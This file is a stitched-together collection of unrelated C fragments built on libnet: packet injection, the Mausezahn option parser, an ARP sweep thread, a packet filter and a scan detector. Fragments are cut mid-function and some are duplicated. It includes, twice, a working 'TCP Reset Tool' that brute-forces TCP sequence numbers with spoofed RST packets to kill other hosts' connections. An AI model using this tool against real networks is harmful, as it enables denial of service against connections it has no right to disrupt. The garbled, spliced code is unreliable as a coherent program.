struct sockaddr_in sin;
char errbuf[1024];
struct ether_addr remote_eth, *tmp_eth;
/* network initialization */
if (libnet_select_device(&sin, &interface, errbuf) == -1) {
return WIRE_ERR_PKTD_NO_WRITE_DEVICE_ACCESS;
}
if ((network = libnet_open_link_interface(interface, errbuf)) == NULL) {
return WIRE_ERR_PKTD_INJECTION_OPEN;
}
/* get local ethernet address */
if ((tmp_eth = libnet_get_hwaddr(network, interface, errbuf)) == NULL) {
(void)libnet_close_link_interface(network);
return WIRE_ERR_PKTD_INJECTION_OPEN;
}
memcpy (&local_eth, tmp_eth, 6);
debug3 ("injection_write_ip: the local ethernet address is %s\n",
ether_ntoa(&local_eth));
/* get remote ethernet address (the packet is already in network order) */
in.s_addr = *(u_int32_t*)(ip_packet+16);
/* try to get the remote MAC address from the ARP cache */
if (get_mac_address (in, buffer, size) < 0) {
/* MAC address of the IP address not in ARP cache */
/* get the gateway needed to reach the destination */
struct in_addr gw;
if (get_gateway (in, &gw) < 0) {
debug3 ("injection_write_ip: can't find MAC nor gateway for %s\n",
inet_ntoa(in));
(void)libnet_close_link_interface(network);
return WIRE_ERR_PKTD_INJECTION_WRITE_IP;
}
/* get the gateway's ethernet address */
if (get_mac_address (gw, buffer, size) < 0) {
debug3 ("injection_write_ip: can't find MAC for %s's ",
inet_ntoa(in));
debug3 ("gateway (%s)\n", inet_ntoa(gw));
/* XXX: This case means typically the destination host is in
* the same network than the source, but the destination MAC
* address is not in the local ARP cache. Getting a local
* MAC address requires implementing ARP, which we won't do
* at this moment
*/
(void)libnet_close_link_interface(network);
return WIRE_ERR_PKTD_INJECTION_WRITE_IP;
}
debug3 ("injection_write_ip: IP address %s can be reached ", inet_ntoa(in));
debug3 ("through gateway %s (%s)\n", inet_ntoa(gw), buffer);
} else {
debug3 ("injection_write_ip: IP address %s corresponds to %s\n",
inet_ntoa(in), buffer);
}
if ((tmp_eth = ether_aton (buffer)) == NULL) {
(void)libnet_close_link_interface(network);
return WIRE_ERR_PKTD_INJECTION_WRITE_IP;
}
memcpy (&remote_eth, tmp_eth, 6);
/* build ethernet header and use IP packet as payload */
#if (defined(bsdi) || defined(__NetBSD__) || defined(__OpenBSD__) ||\
defined(__FreeBSD__))
libnet_build_ethernet(&(remote_eth.octet[0]),
&(local_eth.octet[0]), ETHERTYPE_IP, NULL, 0, buffer);
#else
libnet_build_ethernet(&(remote_eth.ether_addr_octet[0]),
&(local_eth.ether_addr_octet[0]), ETHERTYPE_IP, NULL, 0, buffer);
#endif
memcpy (buffer+LIBNET_ETH_H, ip_packet, packet_size);
packet_size += LIBNET_ETH_H;
/* inject the packet */
if ((i = libnet_write_link_layer (network, interface, buffer,
packet_size)) < packet_size) {
(void)libnet_close_link_interface(network);
return WIRE_ERR_PKTD_INJECTION_WRITE_IP;
}
/* shut down the interface */
(void)libnet_close_link_interface(network);
return WIRE_ERR_NONE;
#else /* INJECT_USING_LINK_LAYER */
return(0);
#endif /* INJECT_USING_LINK_LAYER */
}
seqincrement= atoi(argv[7]);
seqstart= 0;
seqmax = 4294967295; /* 2^32 */
payload = NULL;
payload_s = 0;
src_ip = libnet_name2addr4(l,sourceip,LIBNET_DONT_RESOLVE);
dst_ip = libnet_name2addr4(l,destinationip,LIBNET_DONT_RESOLVE);
memset(enet_dst, 0, sizeof(enet_dst));
sscanf(argv[6], "%02X:%02X:%02X:%02X:%02X:%02X", &enet_dst[0],
&enet_dst[1], &enet_dst[2], &enet_dst[3], &enet_dst[4],
&enet_dst[5]);
l = libnet_init(LIBNET_LINK,device,errbuf);
ptr_enet_src = libnet_get_hwaddr(l);
memcpy(&enet_src[0], ptr_enet_src,6);
printf("Src MAC: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_src[0], enet_src[1],enet_src[2],enet_src[3],
enet_src[4],enet_src[5]);
printf("Dst MAC: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_dst[0], enet_dst[1],enet_dst[2],enet_dst[3],
enet_dst[4],enet_dst[5]);
for (seqguess=seqstart;seqguess<seqmax-seqincrement;seqguess=seqguess+seqincrement) {
count++; count2++;
if (count2==8192) { count2=0; printf("Packets sent: %lu\tSequence guess: %lu\n",count,seqguess); }
l = libnet_init(LIBNET_LINK,device,errbuf);
t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0);
t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0);
t = libnet_build_ipv4(LIBNET_IPV4_H+LIBNET_TCP_H+payload_s,0,242,0,64,IPPROTO_TCP,0,src_ip,dst_ip,NULL,0,l,0);
t = libnet_build_ethernet(enet_dst,enet_src,ETHERTYPE_IP,NULL,0,l,0);
// Purpose: Properly handle arguments and configure global structs (tx)
int getopts (int argc, char *argv[])
{
int i, c, rargs, RX=0, count_set=0, delay_set=0;
unsigned int time_factor;
char *packet_type=NULL, *mops_type=NULL;
char *dum;
unsigned char *dum1, *dum2;
libnet_t *l;
char err_buf[LIBNET_ERRBUF_SIZE];
struct libnet_ether_addr *mymac;
FILE *afp;
char hexpld[MAX_PAYLOAD_SIZE*2];
int hexpld_specified=0;
opterr = 1; // let getopt print error message if necessary
while ((c = getopt (argc, argv, "hqvVSxra:A:b:B:c:d:f:F:p:P:t:T:M:Q:X:")) != -1)
switch (c) {
case 'h':
usage();
break;
case 'q':
quiet=1;
break;
case 'v':
verbose=1;
break;
case 'V':
verbose=2;
break;
case 'S':
simulate=1;
break;
case 'x':
mz_port = MZ_DEFAULT_PORT;
break;
case 'a':
strncpy (tx.eth_src_txt, optarg, 32);
tx.packet_mode = 0;
break;
case 'A':
strncpy (tx.ip_src_txt, optarg, 32);
break;
case 'b':
strncpy (tx.eth_dst_txt, optarg, 32);
tx.packet_mode = 0;
break;
case 'B':
strncpy (tx.ip_dst_txt, optarg, 32);
break;
case 'c':
errno=0;
tx.count = strtol(optarg, (char **)NULL, 10);
if ((errno == ERANGE && (tx.count == LONG_MAX || tx.count == LONG_MIN))
|| (errno != 0 && tx.count == 0)) {
perror("strtol");
return (-1);
}
if (tx.count<0) tx.count=1; //TODO: Allow count=0 which means infinity (need to update all send_functions)
count_set=1;
break;
case 'd':
errno=0;
// determine whether seconds or msecs are used
// default is usec!!!
time_factor=1;
if (exists(optarg,"s") || exists(optarg,"sec")) time_factor=1000000;
if (exists(optarg,"m") || exists(optarg,"msec")) time_factor=1000;
dum = strtok(optarg,"ms");
tx.delay = strtol(dum, (char **)NULL, 10) * time_factor;
if ((errno == ERANGE && (tx.delay == LONG_MAX || tx.delay == LONG_MIN))
|| (errno != 0 && tx.delay == 0)) {
perror("strtol");
return (-1);
}
if (tx.delay<0) tx.delay=0; // no delay
delay_set=1;
break;
case 'p':
errno=0;
tx.padding = strtol(optarg, (char **)NULL, 10);
if ((errno == ERANGE && (tx.padding == LONG_MAX || tx.padding == LONG_MIN))
|| (errno != 0 && tx.padding == 0)) {
perror("strtol");
return (-1);
}
if (tx.padding>10000) {
fprintf(stderr, " Warning: Padding must not exceed 10000!\n");
return -1;
}
break;
case 't':
packet_type = optarg; // analyzed below
break;
case 'X':
mops_type = optarg; // MOPS TRANSITION STRATEGY -- analyzed below
break;
case 'T':
packet_type = optarg;
RX = 1;
break;
case 'r':
mz_rand = 1;
break;
case 'M':
if (strncmp(optarg,"help",4)==0) {
(void) get_mpls_params("help ");
}
else {
strncpy (tx.mpls_txt, optarg, 128);
tx.eth_type = ETHERTYPE_MPLS;
tx.packet_mode = 0;
tx.mpls=1;
}
break;
case 'P': // ASCII payload
strncpy((char*)tx.ascii_payload, optarg, MAX_PAYLOAD_SIZE);
tx.ascii = 1;
break;
case 'f': // ASCII payload in FILE
afp = fopen(optarg, "r");
if (fgets((char*)tx.ascii_payload, MAX_PAYLOAD_SIZE, afp) == NULL)
fprintf(stderr, " mz/getopts: File empty?\n");
fclose(afp);
tx.ascii = 1;
break;
case 'F': // HEX payload in FILE
afp = fopen(optarg, "r");
i=0;
while ( (hexpld[i]=fgetc(afp))!=EOF ) {
if (isspace(hexpld[i])) {
hexpld[i]=':';
}
i++;
}
hexpld[i]='\0';
fclose(afp);
hexpld_specified=1;
break;
case 'Q': // VLAN TAG
if (strncmp(optarg,"help",4)==0) {
print_dot1Q_help(); // ugly but most simple and safe solution
}
else {
strncpy (tx.dot1Q_txt, optarg, 32);
tx.dot1Q=1;
// determine number of VLAN tags
for (i=0; i<strlen(tx.dot1Q_txt); i++) {
if (tx.dot1Q_txt[i]==',') tx.dot1Q++;
}
tx.packet_mode = 0;
}
break;
case '?':
if ((optopt == 'a') || (optopt == 'b') || (optopt = 'c') ||
(optopt == 'd') || (optopt == 'f') || (optopt = 'p') ||
(optopt == 't') || (optopt == 'm'))
fprintf (stderr, " mz/getopts: Option -%c requires an argument.\n", optopt);
else if (isprint (optopt))
fprintf (stderr, " mz/getopts: Unknown option -%c'.\n", optopt);
else
fprintf (stderr, " mz/getopts: Unknown option character \\x%x'.\n", optopt);
return 1;
default:
fprintf (stderr," mz/getopts: Could not handle arguments properly!\n");
return 1;
}
// ********************************************
// Handle additional arguments
// ********************************************
//
// Greeting text
if (verbose) {
fprintf(stderr,"\n"
MAUSEZAHN_VERSION
"\n"
"Use at your own risk and responsibility!\n"
"-- Verbose mode --\n"
"\n");
}
if (argc<2) {
usage();
}
if ((rargs=argc-optind)>2) { // number of remaining arguments
fprintf(stderr," mz/getopts: Too many arguments!\n");
return -1;
}
// There can be 0-2 additional arguments
switch (rargs) {
case 0:
if (lookupdev()) { // no device found
if (verbose) fprintf(stderr, " mz: no active interfaces found!\n");
strcpy(tx.device, "lo");
}
fprintf(stderr," mz: You must specify an interface. Use ifconfig and try again.\n");
exit(0);
case 1: // arg_string OR device given => find out!
if ( dev_exists(argv[optind]) )
{
strncpy (tx.device, argv[optind], 16);
}
else
{ /// arg_string given => no device has been specified -- let's find one!
strncpy (tx.arg_string, argv[optind], MAX_PAYLOAD_SIZE);
if (lookupdev())
{ // no device found
if (verbose) fprintf(stderr, " mz: no active interfaces found!\n");
strcpy(tx.device, "lo");
}
fprintf(stderr," mz: You must specify a valid interface. Use ifconfig and try again.\n");
exit(0);
}
break;
case 2: // both device and arg_string given
if(dev_exists(argv[optind]))
{
strncpy (tx.device, argv[optind], 16);
strncpy (tx.arg_string, argv[optind+1], MAX_PAYLOAD_SIZE);
}
else if(dev_exists(argv[optind+1]))
{
strncpy (tx.device, argv[optind+1], 16);
strncpy (tx.arg_string, argv[optind], MAX_PAYLOAD_SIZE);
}
else
{
if (lookupdev()) { // no device found
if (verbose) fprintf(stderr, " mz: no active interfaces found!\n");
strcpy(tx.device, "lo");
}
fprintf(stderr," mz: You must specify a valid interface. Use ifconfig and try again.\n");
exit(0);
}
break;
default:
fprintf(stderr," mz/getopts: Unknown argument problem!\n");
return 1;
}
if(verbose)
{
if(tx.device) fprintf(stderr," mz: Selected interface: %s\n",tx.device );
if(tx.arg_string) fprintf(stderr," mz: Selected argument string: %s\n", tx.arg_string);
}
if (hexpld_specified) {
strcat(tx.arg_string, ",p=");
strcat(tx.arg_string, hexpld);
}
//////////////////////////////////////////////////////////////////////////
//
// Initialize MAC and IP Addresses.
//
// - tx.eth_src = own interface MAC
// - tx.ip_src = own interface IP or user specified
// - tx.ip_dst = 255.255.255.255 or user specified (can be a range)
// - tx.ip_src_rand ... is set if needed.
//
// Get own device MAC address:
// Don't open context if only a help text is requested
if (getarg(tx.arg_string,"help", NULL)!=1) {
l = libnet_init (LIBNET_LINK_ADV, tx.device, err_buf );
if (l == NULL) {
fprintf(stderr, " mz/getopts: libnet_init() failed (%s)", err_buf);
return -1;
}
mymac = libnet_get_hwaddr(l);
for (i=0; i<6; i++) {
tx.eth_src[i] = mymac->ether_addr_octet[i];
tx.eth_mac_own[i] = mymac->ether_addr_octet[i];
}
// Set source IP address:
if (strlen(tx.ip_src_txt)) { // option -A has been specified
if (mz_strcmp(tx.ip_src_txt, "bcast", 2)==0) {
tx.ip_src = libnet_name2addr4 (l, "255.255.255.255", LIBNET_DONT_RESOLVE);
} else if (strcmp(tx.ip_src_txt, "rand") == 0) {
tx.ip_src_rand = 1;
tx.ip_src_h = (u_int32_t) ( ((float) rand()/RAND_MAX)*0xE0000000); //this is 224.0.0.0
}
else if (get_ip_range_src(tx.ip_src_txt)) { // returns 1 when no range has been specified
// name2addr4 accepts a DOTTED DECIMAL ADDRESS or a FQDN:
tx.ip_src = libnet_name2addr4 (l, tx.ip_src_txt, LIBNET_RESOLVE);
}
}
else { // no source IP specified: by default use own IP address
tx.ip_src = libnet_get_ipaddr4(l);
}
// Set destination IP address:
if (strlen(tx.ip_dst_txt)) { // option -B has been specified
if (mz_strcmp(tx.ip_dst_txt, "rand", 2)==0) {
fprintf(stderr, "Option -B does not support random destination IP addresses currently.\n");
return 1;
}
if (mz_strcmp(tx.ip_dst_txt, "bcast", 2)==0) {
tx.ip_dst = libnet_name2addr4 (l, "255.255.255.255", LIBNET_DONT_RESOLVE);
} else if (get_ip_range_dst(tx.ip_dst_txt)) { // returns 1 when no range has been specified
// name2addr4 accepts a DOTTED DECIMAL ADDRESS or a FQDN:
tx.ip_dst = libnet_name2addr4 (l, tx.ip_dst_txt, LIBNET_RESOLVE);
}
}
else { // no destination IP specified: by default use broadcast
tx.ip_dst = libnet_name2addr4 (l, "255.255.255.255", LIBNET_DONT_RESOLVE);
}
// Initialize tx.ip_src_h and tx.ip_dst_h which are used by 'print_frame_details()'
// in verbose mode. See 'modifications.c'.
if (tx.ip_src_rand) { // ip_src_h already given, convert to ip_src
dum1 = (unsigned char*) &tx.ip_src_h;
dum2 = (unsigned char*) &tx.ip_src;
}
else { // ip_src already given, convert to ip_src_h
dum1 = (unsigned char*) &tx.ip_src;
dum2 = (unsigned char*) &tx.ip_src_h;
}
*dum2 = *(dum1+3);
dum2++;
*dum2 = *(dum1+2);
dum2++;
*dum2 = *(dum1+1);
dum2++;
*dum2 = *dum1;
dum1 = (unsigned char*) &tx.ip_dst;
dum2 = (unsigned char*) &tx.ip_dst_h;
*dum2 = *(dum1+3);
dum2++;
*dum2 = *(dum1+2);
dum2++;
*dum2 = *(dum1+1);
dum2++;
*dum2 = *dum1;
libnet_destroy(l);
}
//
// END OF ADDRESS INITIALIZATION
//
//////////////////////////////////////////////////////////////////////////
////// retrieve interface parameters ///////
for (i=0; i<device_list_entries; i++) {
get_dev_params(device_list[i].dev);
}
//////////////////////////////////////////////////////////////////////////
//
// Mausezahn CLI desired?
if (mz_port) {
// has port number been specified?
if (strlen(tx.arg_string)) {
mz_port = (int) str2int (tx.arg_string);
}
if (!quiet) {
fprintf(stderr, "Mausezahn accepts incoming Telnet connections on port %i.\n", mz_port);
}
mz_cli_init();
cli();
}
//////////////////////////////////////////////////////////////////////////
//
// Mode decision
//
// Consider -t and -m option (used exclusively)
// -t => special packet types, stateless
//
// If -t not present then evaluate arg_string which must
// contain a byte-string in hexadecimal notation.
//
//
// ***** NEW: MOPS TRANSITION STRATEGY *****
if (mops_type != NULL) {
if (mz_strcmp(mops_type,"lldp",4)==0) {
mops_direct(tx.device, MOPS_LLDP, tx.arg_string);
}
}
if (packet_type == NULL) { // raw hex string given
mode = BYTE_STREAM;
}
else if (strcmp(packet_type,"arp")==0) {
mode = ARP;
}
else if (strcmp(packet_type,"bpdu")==0) {
mode = BPDU;
}
else if (strcmp(packet_type,"ip")==0) {
mode = IP;
}
else if (strcmp(packet_type,"udp")==0) {
mode = UDP;
}
else if (strcmp(packet_type,"icmp")==0) {
mode = ICMP;
}
else if (strcmp(packet_type,"tcp")==0) {
mode = TCP;
}
else if (strcmp(packet_type,"dns")==0) {
mode = DNS;
}
else if (strcmp(packet_type,"cdp")==0) {
mode = CDP;
}
else if (strcmp(packet_type,"syslog")==0) {
mode = SYSLOG;
}
else if (strcmp(packet_type,"lldp")==0) {
mode = LLDP;
tx.packet_mode=0; // create whole frame by ourself
}
else if (strcmp(packet_type,"rtp")==0) {
if (RX) {
mode = RX_RTP;
}
else {
mode = RTP;
if (!count_set) tx.count = 0;
if (!delay_set) tx.delay = 20000; // 20 msec inter-packet delay for RTP
}
}
else if (strcmp(packet_type,"help")==0) {
fprintf(stderr, "\n"
MAUSEZAHN_VERSION
"\n"
"| The following packet types are currently implemented:\n"
"|\n"
"| arp ... sends ARP packets\n"
"| bpdu ... sends BPDU packets (STP or PVST+)\n"
"| cdp ... sends CDP messages\n"
"| ip ... sends IPv4 packets\n"
"| udp ... sends UDP datagrams\n"
"| tcp ... sends TCP segments\n"
"| icmp ... sends ICMP messages\n"
"| dns ... sends DNS messages\n"
"| rtp ... sends RTP datagrams\n"
"| syslog ... sends Syslog messages\n"
"|\n"
"| Of course you can build any other packet type 'manually' using the direct layer 2 mode.\n"
"| FYI: The interactive mode supports additional protocols. (Try mz -x <port>)\n"
"\n"
);
exit(1);
}
else {
fprintf(stderr, " mz: you must specify a valid packet type!\n");
}
//////////////////////////////////////////////////////////////////////////
// TODO: Implement macro support
// Check macro types here
return 0;
}
int main(int argc, char *argv[])
{
int c;
unsigned long int count=0;
unsigned long int count2=0;
unsigned long int seqguess=0;
unsigned long int seqstart=0;
unsigned long int seqincrement=0;
unsigned long int seqmax=4294967295;
u_char *cp;
libnet_t *l;
libnet_ptag_t t;
char *payload;
char * device = argv[1];
u_short payload_s;
u_long src_ip, dst_ip;
u_short src_prt, dst_prt;
char errbuf[LIBNET_ERRBUF_SIZE];
char sourceip[32] = "";
char destinationip[32] = "";
/* Change these to suit your local environment values */
/* Make enet_dst either the default gateway or destination host */
struct libnet_ether_addr *ptr_enet_src;
u_char enet_src[6];
u_char enet_dst[6];
u_char org_code[3] = {0x00, 0x00, 0x00};
/* Its only test code, so minimal checking is performed... */
if (argc<8) {
printf("TCP Reset Tool v1.2\nBy Paul Watson - Modified by J. Barber\n");
printf("Usage: %s [interface] [src ip] [src port] [dst ip] [dst port] [gateway/destination MAC] [window size]\n",argv[0]);
printf("Example: ./reset-tcp eth1 172.16.0.1 1 172.16.0.2 2 00:01:02:03:04:05 65536\n");
exit(1);
}
strcpy(sourceip,argv[2]);
src_prt = atoi(argv[3]);
strcpy(destinationip,argv[4]);
dst_prt = atoi(argv[5]);
seqincrement= atoi(argv[7]);
seqstart= 0;
seqmax = 4294967295; /* 2^32 */
payload = NULL;
payload_s = 0;
src_ip = libnet_name2addr4(l,sourceip,LIBNET_DONT_RESOLVE);
dst_ip = libnet_name2addr4(l,destinationip,LIBNET_DONT_RESOLVE);
memset(enet_dst, 0, sizeof(enet_dst));
sscanf(argv[6], "%02X:%02X:%02X:%02X:%02X:%02X", &enet_dst[0],
&enet_dst[1], &enet_dst[2], &enet_dst[3], &enet_dst[4],
&enet_dst[5]);
l = libnet_init(LIBNET_LINK,device,errbuf);
ptr_enet_src = libnet_get_hwaddr(l);
memcpy(&enet_src[0], ptr_enet_src,6);
printf("Src MAC: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_src[0], enet_src[1],enet_src[2],enet_src[3],enet_src[4],enet_src[5]);
printf("Dst MAC: %02X:%02X:%02X:%02X:%02X:%02X\n", enet_dst[0], enet_dst[1],enet_dst[2],enet_dst[3],enet_dst[4],enet_dst[5]);
for (seqguess=seqstart;seqguess<seqmax-seqincrement;seqguess=seqguess+seqincrement) {
count++; count2++;
if (count2==8192) { count2=0; printf("Packets sent: %lu\tSequence guess: %lu\n",count,seqguess); }
l = libnet_init(LIBNET_LINK,device,errbuf);
t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0);
t = libnet_build_tcp(src_prt,dst_prt,seqguess,0x00000001,TH_RST,0,0,0,LIBNET_TCP_H,NULL,0,l,0);
t = libnet_build_ipv4(LIBNET_IPV4_H+LIBNET_TCP_H+payload_s,0,242,0,64,IPPROTO_TCP,0,src_ip,dst_ip,NULL,0,l,0);
t = libnet_build_ethernet(enet_dst,enet_src,ETHERTYPE_IP,NULL,0,l,0);
c = libnet_write(l);
}
printf("packets sent: %i\n",count);
return (EXIT_FAILURE);
}
void *ted_arpmon_thread( void *arg ){
ted_context_t *ted = (ted_context_t *)arg;
struct libnet_ether_addr *if_mac;
struct in_addr if_ip;
libnet_t *nd;
char n_error[LIBNET_ERRBUF_SIZE];
char p_error[PCAP_ERRBUF_SIZE];
unsigned int nhosts,
i,
ip;
libnet_ptag_t net = LIBNET_PTAG_INITIALIZER,
arp = LIBNET_PTAG_INITIALIZER;
unsigned char unknown_hw[ETH_ALEN] = { 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 },
bcast_hw[ETH_ALEN] = { 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF };
pthread_t tid;
if( (nd = libnet_init( LIBNET_LINK, ted->device, n_error )) == NULL ){
ted_die( "Error initializing libnet layer (%s) .\n", n_error );
}
if( (if_mac = libnet_get_hwaddr( nd )) == NULL ){
ted_die( "Error retrieving %s MAC address .\n", ted->device );
}
if( (if_ip.s_addr = libnet_get_ipaddr4( nd )) < 0 ){
ted_die( "Error retrieving %s bound ip address .\n", ted->device );
}
ted->pd = pcap_open_live( ted->device, 65535, 1, 1000, p_error );
if( (ted->datalink = pcap_datalink(ted->pd)) < 0 ){
ted_die( "Error retrieving %s data link layer (%s) .\n", ted->device, p_error );
}
switch( ted->datalink )
{
case DLT_RAW : ted->head_shift = 0; break;
case DLT_PPP :
case DLT_LOOP :
case DLT_NULL : ted->head_shift = 4; break;
case DLT_PPP_ETHER : ted->head_shift = 8; break;
case DLT_EN10MB :
case DLT_EN3MB : ted->head_shift = 14; break;
case DLT_LINUX_SLL :
case DLT_SLIP : ted->head_shift = 16; break;
case DLT_SLIP_BSDOS :
case DLT_PPP_BSDOS :
case DLT_IEEE802_11 : ted->head_shift = 24; break;
case DLT_PFLOG : ted->head_shift = 48; break;
default : ted_die( "Device datalink not supported .\n" );
}
pcap_lookupnet( ted->device, &ted->network, &ted->netmask, p_error );
if( pthread_create( &tid, NULL, ted_arpmon_recv_thread, (void *)ted ) != 0 ){
ted_die( "Could not create alive hosts reciever thread .\n" );
}
nhosts = ntohl(~ted->netmask);
while( 1 ){
for( i = 1; i <= nhosts; i++ ){
ip = (if_ip.s_addr & ted->netmask) | htonl(i);
// don't send arp request to ourself :P
if( ip != if_ip.s_addr ){
arp = libnet_build_arp( ARPHRD_ETHER,
ETHERTYPE_IP,
ETH_ALEN,
4,
ARPOP_REQUEST,
// sender
if_mac->ether_addr_octet,
(unsigned char *)&if_ip,
// reciever
unknown_hw,
(unsigned char *)&ip,
NULL,
0,
nd,
arp );
net = libnet_build_ethernet( bcast_hw,
if_mac->ether_addr_octet,
ETHERTYPE_ARP,
NULL,
0,
nd,
net );
if( libnet_write(nd) < 0 ){
ted_die( "Could not send ARP request .\n" );
}
}
}
usleep( ted->arp_delay );
}
}
int packet_filter()
{
char *dev, *nextdev;
bpf_u_int32 mask;
bpf_u_int32 net;
struct bpf_program fp;
char filter_exp[] = "ip and not dst host 172.16.205.1";
char errbuf[PCAP_ERRBUF_SIZE];
struct pcap_pkthdr header;
const u_char *packet;
libnet_t *int_llif, *ext_llif;
struct ether_addr *t_hwaddr;
pthread_t ntid;
/* if ((dev = pcap_lookupdev(errbuf)) == NULL) {
fprintf(stderr, "Couldn't find default device: %s\n", errbuf);
return(2);
}
printf("Device: %s\n", dev);
*/
if (get_default_gateway(&def_gw) != 0) {
fprintf(stderr, "Couldn't get default gateway\n");
return(2);
}
printf("gw: %s\n", inet_ntoa(def_gw));
/* initialize handler/filter for external network interface */
dev = ext_ifname;
if (pcap_lookupnet(dev, &net, &mask, errbuf) == -1) {
fprintf(stderr, "Couldn't get netmask for the device %s\n", dev);
return(2);
}
printf("net: %s, mask %s\n", inet_ntoa(*(struct in_addr *)&net), inet_ntoa(*(struct in_addr *)&mask));
if ((ext_if = pcap_open_live(dev, BUFSIZ, 1, 1000, errbuf)) == NULL) {
fprintf(stderr, "Couldn't open device %s: %s\n", dev,errbuf);
return(2);
}
if(pcap_compile(ext_if, &fp, filter_exp, 0, net) == -1) {
fprintf(stderr, "Couldn't parse filter %s: %s\n", filter_exp, pcap_geterr(ext_if));
return(2);
}
if(pcap_setfilter(ext_if, &fp) == -1) {
fprintf(stderr, "Couldn't install filter %s: %s\n", filter_exp, pcap_geterr(ext_if));
return(2);
}
if ((ext_llif = libnet_init(LIBNET_LINK, ext_ifname, errbuf)) == 0) {
fprintf(stderr, "Couldn't open local network interface %s: %s\n", ext_ifname, errbuf);
return(2);
}
if ((*((u_int *)&ext_ip) = libnet_get_ipaddr4(ext_llif)) == -1) {
fprintf(stderr, "Couldn't get local ip address for %s \n", ext_ifname);
return(2);
}
if ((t_hwaddr = (struct ether_addr *)libnet_get_hwaddr(ext_llif)) == NULL) {
fprintf(stderr, "Couldn't get local network interface address for %s \n", ext_ifname);
return(2);
}
memcpy((u_char *)&ext_hwaddr, (u_char *)t_hwaddr, ETHER_ADDR_LEN);
libnet_destroy(ext_llif);
if (get_netmask(ext_ifname, &ext_mask) == -1) {
fprintf(stderr, "Couldn't get local netmask for %s \n", ext_ifname);
return(2);
}
printf("ext_ip : %s ", inet_ntoa(ext_ip) );
printf("ext_ip : %s\n", inet_ntoa(ext_mask));
/* initialize handler/filter for internal network interface */
dev = int_ifname;
if (pcap_lookupnet(dev, &net, &mask, errbuf) == -1) {
fprintf(stderr, "Couldn't get netmask for the device %s\n", dev);
return(2);
}
printf("net: %s, mask %s\n", inet_ntoa(*(struct in_addr *)&net), inet_ntoa(*(struct in_addr *)&mask));
if ((int_if = pcap_open_live(dev, BUFSIZ, 1, 1000, errbuf)) == NULL) {
fprintf(stderr, "Couldn't open device %s: %s\n", dev,errbuf);
return(2);
}
if(pcap_compile(int_if, &fp, filter_exp, 0, net) == -1) {
fprintf(stderr, "Couldn't parse filter %s: %s\n", filter_exp, pcap_geterr(int_if));
return(2);
}
if(pcap_setfilter(int_if, &fp) == -1) {
fprintf(stderr, "Couldn't install filter %s: %s\n", filter_exp, pcap_geterr(int_if));
return(2);
}
if ((int_llif = libnet_init(LIBNET_LINK, int_ifname, errbuf)) == 0) {
fprintf(stderr, "Couldn't open local network interface %s: %s\n", int_ifname, errbuf);
return(2);
}
if ((*((u_int *)&int_ip) = libnet_get_ipaddr4(int_llif)) == -1) {
fprintf(stderr, "Couldn't get local ip address for %s \n", int_ifname);
return(2);
}
if ((t_hwaddr = (struct ether_addr *)libnet_get_hwaddr(int_llif)) == NULL) {
fprintf(stderr, "Couldn't get local network interface address for %s \n", int_ifname);
return(2);
}
memcpy((u_char *)&int_hwaddr, (u_char *)t_hwaddr, ETHER_ADDR_LEN);
libnet_destroy(int_llif);
if (pthread_create(&ntid, NULL, clean_thread, NULL) != 0) {
fprintf(stderr, "Couldn't create thread\n");
}
if (pthread_create(&ntid, NULL, ext_thread, NULL) != 0) {
fprintf(stderr, "Couldn't create thread\n");
}
if(pcap_loop(int_if, -1, got_packet, (void *)FROM_INT) == -1) {
fprintf(stderr, "Couldn't filte packet %s: %s\n", filter_exp, pcap_geterr(int_if));
}
pcap_close(int_if);
return(0);
}
int
main (int argc, char **argv) {
int c, valid, bnr = 9, showpopup = 0, flags = 0; /* temporary vars */
char errbuf[PCAP_ERRBUF_SIZE]; /* error buffer */
libnet_t *l; /* libnet handle for address retrieval */
char libnet_errbuf[LIBNET_ERRBUF_SIZE]; /* libnet error messages */
char start_time[24], end_time[24];
time_t acurtime, bcurtime;
struct tm *aloctime, *bloctime;
struct configuration conf, *config=&conf; /* struct to hold config for current session */
struct validated_queue *start = NULL, *end = NULL; /* pointers to validated queue */
/* get current system time */
acurtime = time (NULL);
/* convert it to local time representation */
aloctime = localtime (&acurtime);
/* format time struct into a char array */
strftime (start_time, 24, "%d/%b/%Y %H:%M:%S", aloctime);
/* load default params in config struct */
config->flags = 0;
config->verbose = 0;
config->queue_size = 0;
config->dev = NULL;
config->dport = HTTP;
config->mode = DETECT;
config->gtimeout = TIME_OUT;
config->scan_type = SYN_SCAN;
config->a_port_name = "HTTP";
config->a_scan_type = "SYN_SCAN";
/* parse and load cmd-line params in config struct */
while ((c = getopt (argc, argv, "hi:p:Parsfuetvg:o")) != -1) {
switch (c) {
case 'h':
print_usage ();
exit (EXIT_SUCCESS);
case 'i':
config->dev = optarg;
break;
case 'p':
if (1 <= atoi (optarg) && 65535 >= atoi (optarg)) {
config->dport = atoi (optarg);
}
break;
case 'P':
config->mode = PREVENT;
break;
case 'a':
config->scan_type = ACK_SCAN;
config->flags = config->flags | ACK;
flags = flags | ACK;
break;
case 'r':
config->scan_type = RST_SCAN;
config->flags = config->flags | RST;
flags = flags | RST;
break;
case 's':
config->scan_type = SYN_SCAN;
config->flags = config->flags | SYN;
flags = flags | SYN;
break;
case 'f':
config->scan_type = FIN_SCAN;
config->flags = config->flags | FIN;
flags = flags | FIN;
break;
case 'u':
config->scan_type = UDP_SCAN;
config->a_scan_type = "UDP_SCAN";
break;
case 'e':
config->scan_type = ECHO_SCAN;
config->a_scan_type = "ECHO_SCAN";
break;
case 't':
config->scan_type = TSTAMP_SCAN;
config->a_scan_type = "TSTAMP_SCAN";
break;
case 'v':
config->verbose = 1;
break;
case 'g':
if (1 <= atoi (optarg) && 9 >= atoi (optarg)) {
config->gtimeout = atoi (optarg);
}
break;
case 'o':
showpopup = 1;
break;
case '?':
if ('i' == optopt || 'p' == optopt) {
print_usage ();
exit (EXIT_FAILURE);
} else if (isprint (optopt)) {
printf ("\n [-] unknown option `-%c'\n", optopt);
print_usage ();
exit (EXIT_FAILURE);
} else {
